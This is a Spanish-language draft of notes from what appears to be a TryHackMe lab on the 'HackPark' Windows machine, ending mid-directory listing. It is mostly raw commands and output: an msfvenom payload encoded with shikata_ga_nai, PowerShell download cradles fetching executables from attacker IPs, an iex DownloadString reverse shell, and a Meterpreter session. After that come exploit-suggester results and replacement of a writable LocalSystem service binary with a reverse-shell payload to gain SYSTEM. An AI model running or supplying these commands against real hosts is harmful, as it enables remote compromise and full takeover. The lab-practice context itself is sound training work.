Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 175715 (iteration=0)
x86/shikata_ga_nai chosen with final size 175715
Payload size: 175715 bytes
Final size of exe file: 250880 bytes
Saved as: shellpaimon.exe
----------
BORRADOR NO DAR BOLA:
METERPRETER:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.143.22:8081/shell-paimon.exe','shell-paimon.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.125.241:8081/shellpaimon.exe','shellpaimon.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/shellpaimonX.exe','shellpaimonX.exe')"
EJECUTAMOS EL ARCHIVO:
Start-Process "shellpaimon.exe"
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.143.22:8081/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.143.22 -Port 443".execute().text
BORRADOR
----------
PASAMOS EL ARCHIVO:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.125.241:8081/shellpaimon.exe','shellpaimon.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.82.143:8081/shellpaimon.exe','shellpaimon.exe')"
EJECUTAMOS:
Start-Process "shellpaimon.exe"
CON ESTE FUNCION Y SE EJECUYTO OBTENIENDO LA SHELL METERPRETER EN METASPLOIT:
.\shellpaimon.exe
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.125.241:4445
[*] Meterpreter session 1 opened (10.10.125.241:4445 -> 10.10.118.10:49407) at 2024-01-26 02:09:25 +0000
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
BUSCAMOS MANUALMENTE LOS SERVICIOS QUE SE ESATAN EJECUTANDO:
C:\Windows\Temp>sc query
SERVICE_NAME: AeLookupSvc
DISPLAY_NAME: Application Experience
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: AmazonSSMAgent
DISPLAY_NAME: Amazon SSM Agent
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: AppHostSvc
DISPLAY_NAME: Application Host Helper Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: AWSLiteAgent
DISPLAY_NAME: AWS Lite Guest Agent
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: BFE
DISPLAY_NAME: Base Filtering Engine
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: BrokerInfrastructure
DISPLAY_NAME: Background Tasks Infrastructure Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: CertPropSvc
DISPLAY_NAME: Certificate Propagation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: CryptSvc
DISPLAY_NAME: Cryptographic Services
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: DcomLaunch
DISPLAY_NAME: DCOM Server Process Launcher
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Dhcp
DISPLAY_NAME: DHCP Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Dnscache
DISPLAY_NAME: DNS Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: DPS
DISPLAY_NAME: Diagnostic Policy Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: DsmSvc
DISPLAY_NAME: Device Setup Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Ec2Config
DISPLAY_NAME: Ec2Config
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: EventLog
DISPLAY_NAME: Windows Event Log
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: EventSystem
DISPLAY_NAME: COM+ Event System
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: FontCache
DISPLAY_NAME: Windows Font Cache Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: gpsvc
DISPLAY_NAME: Group Policy Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: iphlpsvc
DISPLAY_NAME: IP Helper
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: LanmanServer
DISPLAY_NAME: Server
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: LanmanWorkstation
DISPLAY_NAME: Workstation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: lmhosts
DISPLAY_NAME: TCP/IP NetBIOS Helper
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: LSM
DISPLAY_NAME: Local Session Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: MpsSvc
DISPLAY_NAME: Windows Firewall
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: MSDTC
DISPLAY_NAME: Distributed Transaction Coordinator
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: netprofm
DISPLAY_NAME: Network List Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: NlaSvc
DISPLAY_NAME: Network Location Awareness
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: nsi
DISPLAY_NAME: Network Store Interface Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: PlugPlay
DISPLAY_NAME: Plug and Play
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Power
DISPLAY_NAME: Power
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: ProfSvc
DISPLAY_NAME: User Profile Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: RpcEptMapper
DISPLAY_NAME: RPC Endpoint Mapper
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: RpcSs
DISPLAY_NAME: Remote Procedure Call (RPC)
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SamSs
DISPLAY_NAME: Security Accounts Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Schedule
DISPLAY_NAME: Task Scheduler
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SENS
DISPLAY_NAME: System Event Notification Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SessionEnv
DISPLAY_NAME: Remote Desktop Configuration
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: ShellHWDetection
DISPLAY_NAME: Shell Hardware Detection
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SystemEventsBroker
DISPLAY_NAME: System Events Broker
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: TermService
DISPLAY_NAME: Remote Desktop Services
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Themes
DISPLAY_NAME: Themes
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: TrkWks
DISPLAY_NAME: Distributed Link Tracking Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: UALSVC
DISPLAY_NAME: User Access Logging Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: UmRdpService
DISPLAY_NAME: Remote Desktop Services UserMode Port Redirector
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: W32Time
DISPLAY_NAME: Windows Time
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: W3SVC
DISPLAY_NAME: World Wide Web Publishing Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WAS
DISPLAY_NAME: Windows Process Activation Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Wcmsvc
DISPLAY_NAME: Windows Connection Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WindowsScheduler
DISPLAY_NAME: System Scheduler Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WinHttpAutoProxySvc
DISPLAY_NAME: WinHTTP Web Proxy Auto-Discovery Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Winmgmt
DISPLAY_NAME: Windows Management Instrumentation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WinRM
DISPLAY_NAME: Windows Remote Management (WS-Management)
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
ESTE SERVICIO ES EL QUE NOS LALMA LA ATENCION Y ES EL QUE PEDIA THM:
SERVICE_NAME: WindowsScheduler
DISPLAY_NAME: System Scheduler Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
BUSCAMOS MAS INFO PUNTUAL DEL SERVICIO:
C:\Windows\Temp>sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
VEMOS PRIVILEGIOS DEL SERVICIO:
C:\PROGRA~2\SYSTEM~1>pwd
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
NO LE GUSTA EL NOMBRE DEL SERVICIO COMO RESPUESTA A THM:
WService.exe
*******.***
WScheduler.exe
SSAdmin.exe
Privilege.exe
WhoAmI.exe
WService.exe
WSLogon.exe
ESTE ES EL BINARIO QUE DEBERIA EXPLOTAR VEMOS SUIS PRIVILEGIOS BUILTING USER A DIFERENCIA DEL BINARIO PRINCIPAL QEU EJECUTA EL SERVICIO PATH:
C:\PROGRA~2\SYSTEM~1>icacls Message.exe
Message.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
--------
ESCANEO CON LA SESION DE METERMPRETER USANDO UN MODULOD E POSTEXPLOTACION multi/recon/local_exploit_suggester:
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.123.185 - Collecting local exploits for x86/windows...
[*] 10.10.123.185 - 173 exploit checks are being tried...
[+] 10.10.123.185 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.123.185 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.123.185 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.123.185 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.123.185 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
3 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
4 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
5 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
6 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
7 exploit/windows/local/always_install_elevated No The target is not exploitable.
8 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
9 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
10 exploit/windows/local/bthpan No The target is not exploitable.
11 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
12 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
13 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
14 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
15 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
16 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
17 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
18 exploit/windows/local/ikeext_service No The check raised an exception.
19 exploit/windows/local/ipass_launch_app No The check raised an exception.
20 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
21 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
22 exploit/windows/local/mqac_write No The target is not exploitable.
23 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
24 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 2012 R2 (6.3 Build 9600). is not vulnerable
25 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
26 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
27 exploit/windows/local/ms14_058_track_popup_menu No The target is not exploitable.
28 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
29 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
30 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms_ndproxy No The target is not exploitable.
33 exploit/windows/local/novell_client_nicm No The target is not exploitable.
34 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
35 exploit/windows/local/ntusermndragover No The target is not exploitable.
36 exploit/windows/local/panda_psevents No The target is not exploitable.
37 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
-------
PROBAMOS EXPLOTAR ESTO "Permisos inseguros en el ejecutable del servicio" PARA LOGRAR ESCALAR PRIVILEGIOS DE SYSTEM:
CREAMOS PAYLOAD CON REVERSESHELL PARA COLARLA COMO SERVICIO ORIGINAL QUE LA EJECUTARA LOCALSYSTEM:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.82.143 LPORT=443 -f exe-service -o rev-svc.exe
PASAMOS EL ARCHIVO A LA MAQUINA VICTIMA:
meterpreter > upload rev-svc.exe
[*] uploading : /root/rev-svc.exe -> rev-svc.exe
[*] Uploaded 47.50 KiB of 47.50 KiB (100.0%): /root/rev-svc.exe -> rev-svc.exe
[*] uploaded : /root/rev-svc.exe -> rev-svc.exe
Una vez que la carga útil está en el servidor de Windows, procedemos a reemplazar el ejecutable del servicio con nuestra carga útil. Dado que necesitamos otro usuario para ejecutar nuestra carga útil, también queremos otorgar permisos completos al grupo Todos:
move WService.exe WService.exe.bkp
C:\PROGRA~2\SYSTEM~1>move WService.exe WService.exe.bkp
1 file(s) moved.
dir
C:\PROGRA~2\SYSTEM~1>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\PROGRA~2\SYSTEM~1
01/26/2024 08:44 PM <DIR> .
01/26/2024 08:44 PM <DIR> ..
05/17/2007 12:47 PM 1,150 alarmclock.ico
08/31/2003 11:06 AM 766 clock.ico
